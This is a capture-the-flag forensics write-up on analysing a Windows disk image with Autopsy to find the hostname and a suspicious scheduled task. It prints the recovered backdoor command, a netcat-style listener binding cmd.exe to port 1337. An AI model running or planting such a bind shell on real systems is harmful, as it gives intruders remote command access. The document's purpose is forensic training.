Autopsy: analysis image ----write up of 'fi03' for in Cyber FastTrack
Problems : we are going to analysis the windows image file.
Tool: kali, autopsy
Step1 : kali has autopsy, so I don't need to install it. But I have to run it with root privilege.Step 2: Open the URL in the browser and created a case to load the image.
Problem 1: find the hostname of the computer
Step 1: Windows event always stores the hostname, so I found the path of the host event and open it as hex, it's not easy to see, then I exported it and open it in the windows virtual machine.
Step 2: In Windows, I added the extension as 'evtx', then I double-clicked it to read the content in it.
We found the host name as 'RESARCH-LAB-42'.
Problem 2: find the customized task scheduler of the user, include all the arguments, path and command.
Step 1: find the task path of windows
We know that the task schedule is stored in
c :/ windows/system32/Tasks
We know that the task schedule is stored in
c :/ windows/system32/Tasks
I found that there is a folder named 'Not a CRON', it is very suspicious. And the other folders are system tasks. I opened 'Not a CRON' as hex, I found the command at the end, I tried it and success!
The command is 'z:\toolsc.exe -l -p 1337 -e c:\windows\system32\cmd.exe'